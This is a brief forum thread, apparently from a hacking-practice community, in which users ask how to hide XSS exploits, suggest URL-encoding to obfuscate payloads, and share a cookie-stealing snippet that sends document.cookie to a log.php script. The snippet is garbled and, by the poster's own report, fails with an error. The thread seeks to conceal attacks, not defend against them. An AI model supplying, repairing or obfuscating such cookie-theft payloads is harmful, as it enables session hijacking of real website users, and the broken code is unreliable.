Hidding XSS exploits

So we all know that window.location is too obviously, so what is better option for hidding xss exploit?

you can obfucate the text, turn it into %25%37%93 …. etc.

Sure I know I can encode url. Somewhere I read about using iframes for xss. Do I create iframe on the same page where is xss and than create target frame or what??

I found this one in hts forum, but don't work for me?

markupi=new image; i.src='log.php?c='+document.cookie

In javascript console I get image not defined error Anybody have idea what is wrong?